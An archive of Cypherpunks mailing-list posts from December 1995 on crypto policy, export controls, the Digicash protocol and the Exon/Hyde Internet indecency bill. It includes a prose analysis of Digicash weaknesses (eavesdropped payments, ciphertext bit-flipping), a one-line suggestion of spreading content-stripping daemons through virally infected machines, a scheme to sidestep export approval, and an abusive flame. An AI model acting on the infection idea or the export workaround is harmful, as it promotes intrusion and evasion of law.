Forwarded message ---------- Date: Wed, 06 Dec 1995 14:39:23 -0800 From: Rich Graves Newgroups: misc.news.internet.announce, misc.news.internet.discuss Subject: Info on Microsoft Internet Announcements Thursday, December 7, 1995 Please reply, if necessary, to the address in the current FAQ, because I very seldom actually log on to America "On Line." Before forwarding this along, please check whether this has already been done; and let me know after the fact. As has already been announced in the print press, Bill Gates, who works at a large software company, will hold a press conference tomorrow, December 7th (a date with some historical significance), to announce Microsoft's Internet strategy. For information on Microsoft-sponsored marketing events in your area, please see http://www.microsoft.com/events/ Approximately fifteen minutes after Mr. Gates begins speaking (anyone have the exact schedule? please phone me), we hope to release very significant updates to the following Internet sites: http://www.c2.org/hackmsoft/ [information on a few security problems with Microsoft products] http://www-leland.stanford.edu/~llurch/win95netbugs/faq.html [canon URL; multiple DNS-load-balancing SPARCServers] http://www-dccs.stanford.edu/NetConsult/Win95Net/faq.html [use this mirror of the above if you have an old DNS server that barfs on the www-leland lbnamed tricks] news.answers, comp.answers, comp.protocols.tcp-ip.ibmpc, and several higher-traffic groups will receive a text rendering of the above. This will be the first approved and rtfm-archived posting; the news-answers folks got back to me last week. gopher://quixote.stanford.edu/1m/win95netbugs will get a text rendering of the above, and contains relevant messages from an email discussion list. An email autoresponder to be named later (finger llurch at elaine.stanford.edu in the morning). The various archives on http://www.hks.net/ have additional information for the technically minded. A PGP-signed copy of this announcement is available on request, but I don't want to confuse the unwashed masses unnecessarily. - -rich "A day that will live in infamy" -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMMYaz43DXUbM57SdAQEeDQP/a8ZccX4fpMbKCNa6Cllii0qWI6A8oUKH 30fdoGl1HvlgWVhsB0paVLsQS8tQGsVt/MzKJLasTsnKuYVJCmdgmXcj9nEE9YIY SxBEDn6yGno2ey7G1lXJSkeVAjB8o/fX+kZXGNKfOGKgNqjIl12jHbW7NX1bsIKi wQl/s4uikQs= =6Z1M -----END PGP SIGNATURE----- From Bill.Humphries at msn.fullfeed.com Wed Dec 6 14:42:44 1995 From: Bill.Humphries at msn.fullfeed.com (Bill Humphries) Date: Wed, 6 Dec 95 14:42:44 PST Subject: Responding to Exon -- technology is not enough Message-ID: Jason Burrell writes: >*Sigh*. Are we really ready to go back to UUCP? It looks like we'll have >to. That is, if someone doesn't set up a couple cryptographically enhanced >subnets first, or come up with some better idea. Interesting prospect, >actually. Fine for the tiny subset of Net users who understand crypto enough to use it on a daily basis. I'm not one of people either. This crypto isn't user friendly stuff. Before you propose such as solution, better make sure people can use this stuff. >Anyone wish to comment on the prospect of a double blind server, set >outside U.S. borders, that can act as an interface to the rest of the >world, perhaps encrypting or stego'ing the data transfered between it and >the user? Basically, an anonymous remailer that acts as a cross between >an NNTP, POP3, and SMTP servers. How are you going to pitch this technology to all the people with AOL and Microsoft Network accounts who barely understand the net? These are the people who need exposure to all the uncensored expression they can get. Instead of figuring out how to build a new treehouse that excludes Exon and Hyde, how about fighting the damned bill in the courts? bill.humphries at msn.fullfeed.com | WisCon 20: Two Decades of Feminism & SF http://www.cs.wisc.edu/wiscon/ | Ursula K. Le Guin: Guest of Honor From an116512 at anon.penet.fi Wed Dec 6 14:50:17 1995 From: an116512 at anon.penet.fi (an116512 at anon.penet.fi) Date: Wed, 6 Dec 95 14:50:17 PST Subject: latest librand source now av Message-ID: <9512062243.AA04215@anon.penet.fi> In .cypherpunks, Matt Blaze writes: >[Sorry if this is a duplicate; my machine had a bogus sendmail.cf >when I first sent this.] > >Souce code for the latest version of librand (a random >number package based on event interval variations) for >Unix-like machines is now available in: > ftp://ftp.research.att.com/dist/mab/librand.shar > >There are no restictions on use or distribution of this >code, which was written by Matt Blaze, Jack Lacy, and >Don Mitchell. > >-matt > why the FUCK would anyone want to use random number code from at&t, (and mister nescape GAK apologist himself)? this the code that was broken by french student for christs sakes. and tell us the truth about the restrictions, next time, bozo. asshole. cypherpunks write code themselvess!!! --****ATTENTION****--****ATTENTION****--****ATTENTION****--***ATTENTION*** Your e-mail reply to this message WILL be *automatically* ANONYMIZED. Please, report inappropriate use to abuse at anon.penet.fi For information (incl. non-anon reply) write to help at anon.penet.fi If you have any problems, address them to admin at anon.penet.fi From hroller at c2.org Wed Dec 6 14:58:26 1995 From: hroller at c2.org (Hroller Anonymous Remailer) Date: Wed, 6 Dec 95 14:58:26 PST Subject: [NOISE] Re: PGP Message-ID: <199512062254.OAA12338@infinity.c2.org> > > you really ought to be more thoughtful about what and how you write on > > the cypherpunks list... ** Vast numbers of double spaces deleted ** > The how is referring to not double spacing isn't it. Sorry, > I've been up for the last couple of days and didn't even realize it. > What do you mean what I write about? He means that this is NOT alt.security.pgp - we are not here to teach you how to use a bloody C compiler or to summarise README notes for you. RTFM. > > anyway, the PGP code from MIT should compile on nearly all unix > > machines. i'm not sure it will compile with a g++ compiler though. all > > unix type machines should have uncompress, tar, (g)cc. just get the > > source from MIT. > > I am not an idiot. I must have downloaded PGP from about 20 million > different places. They are all either missing files, some times the > darn code won't compile, or when I "tar xvf" half of the files bring > up an error and the computer says it can not create the file. I'll try > the address that you've sent. Hopefully I will have better luck. You want help, but supply minimal information. Post your problem to the appropriate place - alt.security.pgp, and supply a bit of information - what version of the source are you trying to compile, what Unix platform, what version of the C compiler, etc. > In the persuit of constructing a stable cryptographic program > that uses PGP what features should be included. Obviously all of > the ones that PGP has and encrypting/decrypting e-mail but what else? ? From unicorn at schloss.li Wed Dec 6 14:59:41 1995 From: unicorn at schloss.li (Black Unicorn) Date: Wed, 6 Dec 95 14:59:41 PST Subject: The "Future" Fallacy In-Reply-To: <9512061801.AA07656@krypton.chromatic.com> Message-ID: On Wed, 6 Dec 1995, Ernest Hua wrote: > > > > I think Duncan was mad at the 'soon.' Why not today? > > I think I can answer this question because I was an obnoxious little > hacker with an Atari 800 when I was a kid. The only thing I did not > have was a modem and an Internet connection (thus ability to read > sci.crypt.research etc ...) [...] > means, a super-smart person. Therefore, it is not a stretch to > believe that kids today can perform powerful encryption in the > privacy of their own homes. Not a stretch? I'd say it was proven fact two years ago. This, I believe, was Duncan's point. [...] > Ern > > --- My prefered and soon to be permanent e-mail address: unicorn at schloss.li "In fact, had Bancroft not existed, potestas scientiae in usu est Franklin might have had to invent him." in nihilum nil posse reverti 00B9289C28DC0E55 E16D5378B81E1C96 - Finger for Current Key Information From daw at guaymas.CS.Berkeley.EDU Wed Dec 6 15:02:28 1995 From: daw at guaymas.CS.Berkeley.EDU (David A Wagner) Date: Wed, 6 Dec 95 15:02:28 PST Subject: Still more on the Digicash protocol Message-ID: <199512062301.SAA15714@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- Ian & I were talking about the Digicash protocol some more. Hal has pointed out that payments & deposits with a wildcard in the payment_hdr should NOT be sent in the clear, since they can be stolen by any passive eavesdropper. Ian has pointed out the same problem with cancellations: the payer_code should NOT be sent in the clear, since any passive eavesdropper can grab this info and steal the corresponding payment. Sadly, the current Digicash client DOES send those items in the clear (without even warning users to avoid wildcards). Why? Anyhow, the obvious solution is encryption. Our new observation is that encrypting deposits & cancellations with the mint's public key is not enough to solve the problem. To see this, recall how the public key encryption works: a session key for a bulk cipher is encrypted under the public key, and the data (e.g. userhdr, payment_hdr, coins, ...) is encrypted under the bulk cipher. Digicash hasn't told us yet what bulk cipher they use, but let's assume for concreteness they use RC4. Now I'm an attacker -- I want to modify userhdr.userID -- and then the mint will accept the payment and deposit the coins into the wrong account. But this is just easy for an active attacker -- I just flip bits in the ciphertext! (Presumably I can guess fairly well what plaintext value is expected for the userhdr.userID field.) This is just a corollary of my Pet Peeve for protocol designers: Don't use encryption when you want message authentication; with encryption, you should only count on confidentiality! Ok, so you mention that maybe Digicash uses DES-CBC or somesuch instead of a stream cipher like RC4. I'll briefly note that while the attack isn't so trivial anymore, DES-CBC ciphertext is not tamper-proof -- again, encryption does not provide message authentication. Another nitpick from your friendly neighborhood techno-geek. I noticed that signatures (when used) don't cover the headers. Since the mint uses header information to make important decisions (e.g. the userhdr.userID field specifies who's account a deposit should go to), shouldn't this be signed, just as a matter of ordinary everyday paranoia? While I'm ranting, let me also remind you of a problem Ian discovered earlier through reverse-engineering: the payment & deposit messages aren't encrypted, and they send payee (e.g. shop) identity payer's and payee's banks payer's currency-of-choice amount of money transferred description of the product time of payment in the clear, accessible to any passive eavesdropper. With traffic analysis, if payers use the default TCP connection, all this information about them can be compiled. If I target a payer, I'll probably be able to record all his transactions (unless he's using remailers or pipenet). If I sit outside a small business, I can compile a dossier on its buying habits. Worse still, anonymity for the shop is worse with Digicash than with real cash. If I pay you real cash on a secluded street, you're fairly anonymous. If I pay you Digicash over the Internet, any passive eavesdropper could be recording your identy and the whole transaction. Blech. So Digicash's product does all sorts of neat crypto to provide you with anonymity from the bank, but doesn't do much to provide anonymity from eavesdroppers on the Internet. This is exactly backwards from how I'd prioritize -- I'll trust my bank to keep me private long before I'll trust messages sent in the clear over the Internet (on a virtual postcard) for all to see! Blech. So, what should Digicash be doing to remedy these problems? * always set up an encrypted, authenticated connection before sending any messages in the Digicash protocol. (Yes, this means shops will need to have certificates if you want to avoid a man-in-the-middle attack. So be it. Most online shops will be using SSL, and thus have a certificate anyhow. You can safely punt on the authentication between customer <-> shop if you're not worried about active attacks.) * add a big warning to the documentation: users should not use wildcards in payments (unless they know the dangers & are encrypting with e.g. PGP). * sign the header stuff too. * continue specifying the protocol at a deeper level, like you promised (and throw in source for security-critical modules too, eh? :-) - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBMMYgtioZzwIn1bdtAQHx9QF+J6qWEqWcsaoVOUQ3i9qaVF8MgYdztCLg 9si9YDnjqPnFEsGTHYBjZXB8/TpOfiZe =cBGu -----END PGP SIGNATURE----- From futplex at pseudonym.com Wed Dec 6 15:08:38 1995 From: futplex at pseudonym.com (Futplex) Date: Wed, 6 Dec 95 15:08:38 PST Subject: Untraceability in Mobile Networks In-Reply-To: <9512060854.AA12541@supra.comm.mot.com> Message-ID: <199512062309.SAA16230@thor.cs.umass.edu> Loren J. Rittle writes: > FYI, at MobiCom '95, an ACM sponsored conference, an interesting paper > entitled, _Untraceability in Mobile Networks_, was presented. The > authors of the paper are Didier Samfat, Refik Molva and N. Asokan. The same authors presented papers on similar themes at MCSA `94 (Workshop on Mobile Computing Systems and Applications). See From perry at piermont.com Wed Dec 6 15:18:39 1995 From: perry at piermont.com (Perry E. Metzger) Date: Wed, 6 Dec 95 15:18:39 PST Subject: latest librand source now av In-Reply-To: <9512062243.AA04215@anon.penet.fi> Message-ID: <199512062319.SAA13164@jekyll.piermont.com> an116512 at anon.penet.fi (Shithead) writes: > In .cypherpunks, Matt Blaze writes: > >Souce code for the latest version of librand (a random > >number package based on event interval variations) for > >Unix-like machines is now available in: > > ftp://ftp.research.att.com/dist/mab/librand.shar > > why the FUCK would anyone want to use random number code from at&t, > (and mister nescape GAK apologist himself)? this the code that was > broken by french student for christs sakes. What drugs, exactly, have you been taking, and where can we buy them? They are obviously very good, although it appears that you are getting a bit of a paranoid edge from them. (For those not in the know... 1) Matt Blaze is the guy that, among other things, embarassed the NSA with his discovery of flaws in Tessera, which made the front page of the times. 2) His code has nothing to do with Netscape, and neither does he.) .pm From dlv at bwalk.dm.com Wed Dec 6 15:29:40 1995 From: dlv at bwalk.dm.com (Dr. Dimitri Vulis) Date: Wed, 6 Dec 95 15:29:40 PST Subject: Note on "Barring Netscape" In-Reply-To: <9512061547.ZM8340@glacius.alias.com> Message-ID: "Richard Martin" writes: > On Dec 6, 11:57am, Richard Charles Graves wrote: > > The Microsoft Internet Explorer sends the user-agent "Mozilla 1.22 > (compatible" > > to hte server, which triggers an incorrect response from, e.g., www.c2.org. > > This little fraud has the potential to make you look silly if left > unexplained. > > this *is* fraud, in a way. Microsoft is shipping a product which in a > certain exchange claims to be a product of another company. Microsoft's > software is being treated better around the net because it is recognised > as Netscape, which it isn't. This reminds me of how many many years ago, when IBM and Microsoft were good friends, earlier version of MS Windows(?) video drivers were hard-coded not to recognize a video card as being VGA-compatible (or even EGA-?) unless its ROM had the 3 letters "IBM" at offset 0x1e. The genuine vanilla IBM card had the words "COPYRIGHT IBM" at that address. Various clone makers had to put "IBM" at that location to make their cards work with Windows(?). E.g., I have a Trident VGA card whose ROM says "RESERVED FOR IBM COMPATIBILITY" positioned so that "IBM" is exactly at 0x1E. Some other cards just say "IBM" there with no explanation in adjascent memory. I think that if some servers refuse to talk to clients unless they see "Mozilla", then I can't blame Microsoft for impersonating Netscape. I think the whole protocol is way stupid. Instead of asking the client for its name, and then looking up in some database what a client with that name is capable of, a server should ask the client only about the capabilities that the server is planning to use. --- Dr. Dimitri Vulis Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From stewarts at ix.netcom.com Wed Dec 6 15:35:15 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Wed, 6 Dec 95 15:35:15 PST Subject: NIST GAK export meeting, short version Message-ID: <199512062336.PAA13924@ix6.ix.netcom.com> At 11:26 PM 12/5/95 -0500, Futplex wrote: >> and on the 64-bit issue, that the government is "not certain it will >> work." he says they "want to see it implemented and want to see ... >This answer sounds rather silly to me. Do they seriously doubt that the >escrow mechanism works (modulo MAB's observations about the LEAF), or expect >us to believe that they do ? Clinton Brooks' comments cited later by Pat >suggest a certain acceptance that enforcement will have its problems >(e.g. strong crypto tunnelling), but perhaps Greiveldinger somehow doesn't >officially share that view. Is there another interpretation of "working" >I'm missing here ? "Works" means a lot of things, even if you limit the discussion to official court warrants requested with honest affidavits. The code is supposed to discourage tampering, but suspects may still successfully disable GAK. Escrow agents are supposed to deliver the correct keys successfully without losing them (or storing them safely in the basement next to the cyclotron), and they may not always provide 7x24 access (or may charge extra for it, as well as charging for their lawyer's review of the warrant.) Or the escrow agents may be multinationals that store their files off-shore. Or the SECRET cleared escrow employee may have quit, making it more difficult to handle classified requests. #-- # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281 # Anybody notice that Microsoft's Wide Open Road ad has barbed-wire fences # on both sides of the road? From stewarts at ix.netcom.com Wed Dec 6 15:35:19 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Wed, 6 Dec 95 15:35:19 PST Subject: Solution for US/Foreign Software? Message-ID: <199512062336.PAA13979@ix6.ix.netcom.com> >>>1. Write a program with limited encryption (40 bit?), with the encryption >>>module in a file external to the main program. >>>2. Get export approval for this program. >>>3. Write a module which replaces the encryption file, increasing key size >>>to whatever you REALLY wanted in the first place. (128-bit IDEA, 2000-bit >>>PGP, etc.) >>>4. Ship that new module with the old software to US customers. >>>Naturally, that new module will "leak," so anybody who buys the old Tim May replied >>"Crypto hooks," basically the scheme you are proposing, were thought of by >>the authorities and are not a bypass of the crypto export laws. I had interpreted the suggestion differently - rather than a system with user-accessible crypto hooks, the manufacturer could ship a binary patch upgrade for US customers to install. The internal design would presumably have crypto hooks (i.e. subroutine calls); they can't ban that. Of course, if you follow this strategy, get export approval for version 1.0, and ship the US-only patch as 1.1, getting export approval for version 2.0 may be a shade more difficult... #-- # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281 # Anybody notice that Microsoft's Wide Open Road ad has barbed-wire fences # on both sides of the road? From stewarts at ix.netcom.com Wed Dec 6 15:35:34 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Wed, 6 Dec 95 15:35:34 PST Subject: NIST GAK export meeting, short version Message-ID: <199512062336.PAA14035@ix6.ix.netcom.com> At 07:11 AM 12/6/95 -0400, pfarrell at netcom.com wrote: >They claimed it was needed so that they can serve a court order >that is SECRET. .... >The main area that they claimed was for FISA orders. Maybe this is just an artifact of Pat's wording, but this sounds like there may be classified court orders other than FISA? > Plus, since you have to be a US citizen to get a clearence, > how can there be approved foreign escrow agents? By deals with the foreign governments, presumably reciprocal. The US would allow export of software using the escrow keys for Banque du Commerce et Credit Internationale - Paris, if the bank and the French spooks signed an agreement for escrow access, and in return the US would probably agree to give the French access to some US-escrowed keys (with proper requests, of course.) >And the usual, why in hell would a competent spy use >crypto escrowed in the US? Competent spies appear to be a surprisingly small fraction of even government-employed espionage personnel, or maybe long-term espionage is just inherently difficult the Soviet Empire, Nazi Germany, and WWII Britain had all identified most of the spy rings operating against them. Philip Agee's article on how to identify the CIA agents in a US embassy may have surprised the CIA, but wouldn't have given any significant new information to the KGB. (They might have been surprised he'd _say_ it...) And amateurs and newcomers to the business aren't always that good. Also, maybe a spy would be using GAKed crypto to avoid attracting attention. Much of espionage, especially emerging economic espionage, primarily uses open-source information; there's nothing too secret about sending the latest SAIC want-ads from EE Times back home, but the CIA may learn what targets you're watching by watching enough of your traffic to guess at your filtering criteria. And sometimes you're just stuck on the Beltway and have to use your car phone to say you'll be a bit late dropping off the secret plans. #-- # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281 # Anybody notice that Microsoft's Wide Open Road ad has barbed-wire fences # on both sides of the road? From stewarts at ix.netcom.com Wed Dec 6 15:35:37 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Wed, 6 Dec 95 15:35:37 PST Subject: Secret Clearance (was: re: NIST GAK export meeting, sv) Message-ID: <199512062336.PAA14064@ix6.ix.netcom.com> At 09:00 PM 12/5/95 -0500, Pete Loshin wrote: >The point is, if you want to keep your organization's systems secure, >you need some mechanism to do so. Security clearance is one way; >banks and other financial institutions do other things (like finger prints, >background checks, etc.) ... >My big question is, do any of the companies providing Internet services, >or Internet software, or digital commerce services/software, employ >any of these security mechanisms on their employees? Few, if any, other than companies already in the military business; secret clearances are _expensive_, usually take a long time to get, and the military only gives them to people who need them. Normally, to get clearances for your employees, you need to have a security bureaucracy to also get clearance for handling classified material in your building, though perhaps they'd make other arrangements so the cleared escrow agent could take the master keys down to the local FBI office to unlock somebody's correspondence. Commercial companies are more likely to use bonding services to insure themselves against employee theft, though they also do things like talking to previous employers, and for sensitive positions some companies check criminal records. Many companies will run a TRW-or-equivalent credit check on applicants to see if there are major outstanding problems (though somehow the Mafia seldom reports bad gambling debts to TRW :-), and some companies pretend they're doing drug tests to check for people with expensive habits. #-- # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281 # Anybody notice that Microsoft's Wide Open Road ad has barbed-wire fences # on both sides of the road? From EALLENSMITH at mbcl.rutgers.edu Wed Dec 6 15:45:35 1995 From: EALLENSMITH at mbcl.rutgers.edu (E. ALLEN SMITH) Date: Wed, 6 Dec 95 15:45:35 PST Subject: News on Congressional Debate on Exon Message-ID: <01HYHWSWQVWG9S3RQJ@mbcl.rutgers.edu> The following are from NandO.net, CDT, and EFF respectively. Sorry about the lack of editing, but I'm having editor problems. I don't know what the "fused" bill looks like. The White one can be gotten around through tactics such as daemons deleting "adults only" signifiers when passing through one's (or a virally-infected) machine, or via the offshore (unfiltered) server idea. Otherwise, everything that Congress doesn't like may wind up being accessible only via identification. If it's more like the Exon & Hyde one, then we've got real problems. That one is broad enough to be probably tossed out by the courts (or by Clinton if he ever shows the guts). -Allen __________________________________________________________________________ (c) 1995 Copyright Nando.net (c) 1995 Associated Press WASHINGTON (Dec 6, 1995 - 16:57 EST) -- House lawmakers agreed Wednesday on a plan that would make it illegal for a company to knowingly transmit sexually explicit and other "indecent" material to minors over computers. The agreement makes it all but certain that if legislation overhauling the nation's telecommunications laws is enacted, it will contain some of the most sweeping anti-smut provisions ever imposed on computer communications. The plan is part of negotiations on a larger telecommunications bill and settles differences among House members who were deeply divided over how to best limit children's exposure to smut carried on computer services, including the global network, Internet. The plan not only toughens an anti-smut provision contained in a a House telecommunications bill, but brings it in line with a provision in the Senate's telecommunications bill. "We're on the road to an agreement that most can agree to," said Sen. J. James Exon, D-Neb., author of Senate's anti-smut provision, which like the House plan also outlaws the transmission of indecent material to minors. House and Senate lawmakers serving on a committee to reconcile House- and Senate-passed telecommunications bills met for the second time in six weeks on Wednesday. "I'm determined to finish this bill," said Sen. Larry Pressler, R-S.D., architect of the Senate's telecommunications measure and chairman of the conference committee. Supporters are scrambling to bring a final bill to each chamber for a vote by Dec. 15. Rep. Thomas Bliley, R-Va., the primary author of the House bill, said the conference could be completed "within days." While the panel ended up reconciling nearly three dozen largely non-controversial provisions contained in both bills, it has yet to resolve differences on the most contentious issues -- the conditions by which Bell companies may enter the long-distance business and media ownership. A tentative agreement on another contentious issue -- cable deregulation -- would lift existing price regulations on all but the smallest cable TV systems in at least three years. Small systems would be deregulated upon enactment. The House's anti-smut plan -- a combination of dueling proposals from Rep. Rick White, R-Wash., and Henry Hyde, R-Ill., would prohibit content providers on a computer service from "knowingly sending or directly sending" sexually explicit material to anyone 18 years old and younger. Companies that provide access to computer networks, like America Online and CompuServe, would not be liable under the provision, White said. The Department of Justice would enforce the provision, which also carries criminal penalties of up to two years in jail and $100,000 in fines. Businesses and civil liberties groups opposed Hyde's plan to toughen the House's anti-smut provision by making it illegal for a content provider to knowingly transmit indecent materials. Instead, they had rallied behind a proposal from White, whose district includes the headquarters of Microsoft, that among other things, would have prohibited only the transmission of materials "harmful to minors" and would not have outlawed indecent transmissions. The Center for Democracy and Technology Policy, one of the main groups pushing for weaker anti-smut provisions, had no immediate comment on the House plan. But Mike Russell, a spokesman for the Christian Coalition, which backed Hyde's tougher standard, said: "It is clearly going in our direction. We were holding out for tougher language and it appears we're going to get it." Indecent speech, unlike obscenity, is protected under the First Amendment. Though the House plan doesn't yet specifically define "indecent," the standard legal and regulatory definition says it is material that describes in terms patently offensive, as measured by contemporary community standard, sexual or excretory activities or organ. Transmission of obscene materials whether by print, broadcast, cable or computers is illegal. Obscenity is something that, measured by community standards, lacks, among other things serious artistic, political or scientific or social merit.  ------------------------------------------------------------------------ ****** ******** ************** ******** ********* ************** ** ** ** *** POLICY POST ** ** ** *** ** ** ** *** December 4, 1995 ** ** ** *** Number 31 ******** ********* *** ****** ******** *** ------------------------------------------------------------------------ A briefing on public policy issues affecting civil liberties online ------------------------------------------------------------------------ CDT POLICY POST Number 31 December 4, 1995 CONTENTS: (1) House Conferees to Vote Wednesday on Fate of Net (2) How To Subscribe To The CDT Policy Post Distribution List (3) About CDT, Contacting Us This document may be re-distributed freely provided it remains in its entirety. Excerpts may be re-posted by permission (editor at cdt.org) ------------------------------------------------------------------------ - (1) HOUSE CONFEREES TO VOTE WEDNESDAY ON FATE OF THE NET On Wednesday December 6, members of the House conference committee will vote on how to deal with the controversial "cyberporn" issue. The full House/Senate conference committee will consider the issue within the next two weeks. After months of contentious debate, the conferees must now choose between two proposals: one proposal sponsored by Representative Henry Hyde (R-IL) and an alternative proposed by Rep. Rick White (R-WA). The Hyde proposal would severely restrict freedom of speech on the Internet, and grant the Federal Communications Commission new authority to regulate online content. The White proposal relies on parents, not federal bureaucrats, to determine what material is and is not appropriate for themselves and their children, though it also imposes new criminal penalties for individuals who transmit material that is "harmful to minors". The outcome of this decision will have tremendous implications on the future of freedom of expression and the development of interactive media as a whole. If the Hyde proposal prevails, the Internet as we know it will never be the same. CDT firmly believes that no new laws in this area are necessary. Current law is already working to punish online stalkers and prosecute the distribution of obscene material online. However, choosing nothing is not an option available to the Conference Committee. Given the options before the committee, CDT believes that the effort of Congressman White should be commended. He has tried to find a resolution to this issue which preserves freedom of speech and relies on user empowerment over government control of online content. Rep. White's proposal represents the only option on the table which will not destroy the Internet and the future of interactive communications technologies. Although this is a difficult choice for the Net.Community, White must prevail at this stage. The Hyde proposal, which is being pushed heavily by the Christian Coalition, would severely restrict freedom of speech and the democratic potential of the Internet and other interactive media. It fails to recognize the global, decentralized nature of interactive media and its tremendous ability for user control. The proposal would be wholly ineffective at accomplishing its stated objective of protecting children from objectionable material, while destroying the Internet in the process. If the conferees choose Hyde's approach over White, the Federal Communications Commission will, for the first time ever, have the authority to regulate online content and the underlying technologies of the net itself. In addition, the First Amendment and the free flow of information online will be chilled by an overly broad "indecency" standard. Online service providers will be forced to monitor all traffic to ensure that no "indecent" material is transmitted (creating a nightmare for freedom of speech and privacy), or shut down some service all together for fear of expensive law suits or prison sentences. And although all these provisions can be challenged in court, recent history with the so-called "dial-a-porn" and indecency an cable channels (Alliance for Community Media vs. FCC) suggest that such challenges can take years to resolve, and even then with no guarantee of success. Representative White's approach seeks to protect cyberspace from intrusion by the federal government, and to empower parents to make decisions about what is and is not appropriate for themselves and for their children. While the proposal does contain new criminal provisions, including restrictions on the display of material that is "harmful to minors", it also creates a defense to prosecution for those who take good faith, reasonable efforts to label content and enable others to block it using user control technologies. The fate of the Net, and the future of freedom of speech and the democratic potential of interactive media, now rests in the hands of the conference committee members. OVERVIEW OF THE HYDE AND WHITE PROPOSALS I. THE HYDE PROPOSAL Representative Hyde is pushing an unconstitutional and overly regulatory proposal which would criminalize the transmission and display of "indecent material" (a broad classification which includes everything from the so-called '7 dirty words' to classic works of fiction such as The Catcher In the Rye and Ulysses), hold carriers liable for material created by their subscribers, and grant the Federal Government broad new authority over online content and the underlying technologies of the Internet. The Hyde proposal has been endorsed by the Christian Coalition and other members of the "religious-right". Among other things, the Hyde proposal would: 1. Create $100,000 fines and 2 year jail terms for anyone who makes or makes available any indecent material to a minor (Sec 402 (d)). 2. Grant the FCC broad authority over on line speech and over online technology (Sec (e)(1)) 3. Criminalize the transmission or display of indecent material to anyone under 18 years of age (Amendment to 18 USC 1465), 4. Not pre-empt state from passing even more restrictive, or even inconsistent, regulations. See CDT Policy Post No. 30 (December 1, 1995) for a detailed description of the Hyde proposal. For more information, including the text of the Hyde proposal and other relevant documents, visit CDT's net-censorship issues page (http://www.cdt.org/cda.html) II. THE WHITE PROPOSAL The proposal offered by Representative White, an original co-sponsor of the Cox/Wyden/White "Internet Freedom and Family Empowerment" Amendment, is based on the user empowerment aspects of the original Cox/Wyden/White amendment. The White proposal substitutes the narrower "harmful to minors" standard for "indecency", and prohibits the FCC from imposing content regulations on online speech and from meddling in the underlying technologies of the Internet. While the White proposal does prohibit the "display" of material that is harmful to minors online, it creates a defense for those who take good faith, reasonable steps, to labile content and enable users to block or objectionable material using user control technologies (such as SurfWatch, the Parental Control features of AOL or Prodigy, or the PICS standards being developed by MIT and the World Wide Web Consortium). Briefly, the White proposal would: 1. Prohibit intentionally sending material that is harmful to minors directly to a to someone the sender knows is a minor, 2. Prohibit the display of material that is harmful to minors. However, content providers (including individual users) would be immune to prosecution if they have taken good faith, reasonable efforts to labile their content and enable it to be blocked or filtered by others (The MIT/World Wide Web consortium's PICS would be one example), 3. Prohibit the FCC from regulating content on or the technologies of the Internet and other interactive media, 4. Pre-empt inconsistent state laws, although this provision would not apply to individuals, non-profit providers of interactive computer services (such as BBS's or freenets), or non-profit organizations. 5. Clarify the House-passed Cox/Wyden/White to ensure that it does inadvertently create loopholes in ECPA or other privacy laws, 6. Protect online service providers from vicarious liability for transmitting their subscribers messages or for merely providing access to the Internet. III. BACKGROUND ON THE "HARMFUL TO MINORS" STANDARD White's proposal would prohibit sending material that is "harmful to minors" directly to a minor, as well as prohibit the display of material that is "harmful to minors" unless good faith, reasonable steps to labile and enable others to block access to such material. Harmful to minors is an intermediate standard between indecency and obscenity. It is essentially material that is obscene to a minor. It has been used in 48 state statutes and has been ruled constitutional by the Supreme Court. It is defined as follows: "'harmful to minors' means any communications or material that is obscene or that: (a) taken as a whole, and with respect to minors, appeals to a prurient interest in nudity, sex, or excretion; (b) depicts, represents, or describes in a patently offensive way with respect to what is suitable for minors, ultimate sexual acts, normal or perverted, actual or simulated, sado-masochistic acts or abuse; or lewd exhibition of the genitals, pubic area, buttocks, or post-putertal female breasts; and (c) taken as a whole, lacks serious literary, artistic, political, or scientific value for minors. Materials that would be acceptable under this standard include the text of Catcher in the Rye, Ulysses, the use of the "7 dirty words" in context, and works of art which contain nudity. These same materials would be prohibited under an "indecency" standard. NEXT STEPS Once the House conferees vote on Wednesday, the full House/Senate conference committee will consider the issue. If the House conferees accept the White proposal, there will be additional opportunities to clarify and strengthen the proposal. However, if Hyde prevails, the entire battle will be lost. In addition to the "cyberporn issue", there are several other issues in the telecommunications bill which the conferees much resolve, including competition in the long distance market, cable rate regulation, and universal service, to name a few. The Republican leadership has reportedly instructed the conferees to finish all remaining issues this week and to have the final bill ready for the full House and Senate during the week of December 11. It is not clear whether this deadline can actually be met given the range of unresolved issues, but the House and Senate leadership appear committed to the timeline. CDT will keep you informed of developments on this issue as they occur. We will also post the text of the White proposal on our net-censorship web page as soon as a final copy is available (we expect it to be posted by Tuesday afternoon 12/5). For more information, visit CDT's net-censorship issues page: http://www.cdt.org/cda.html ------------------------------------------------------------------------ --- (2) HOW TO SUBSCRIBE TO THE CDT POLICY POST LIST CDT Policy Posts, which is what you have just finished reading, are the regular news publication of the Center For Democracy and Technology. CDT Policy Posts are designed to keep you informed on developments in public policy issues affecting civil liberties online. SUBSCRIPTION INFORMAITON 1. SUBSCRIBING TO THE LIST To subscibe to the policy post distribution list, send mail to "Majordomo at cdt.org" with: subscribe policy-posts in the body of the message (leave the subject line blank) 2. UNSUBSCRIBING FROM THE LIST If you ever want to remove yourself from this mailing list, you can send mail to "Majordomo at cdt.org" with the following command in the body of your email message: unsubscribe policy-posts youremail at local.host (your name) (leave the subject line blank) You can also visit our subscription web page URL:http://www.cdt.org/join.html ----------------------------------------------------------------------- (3) ABOUT THE CENTER FOR DEMOCRACY AND TECHNOLOGY/CONTACTING US The Center for Democracy and Technology is 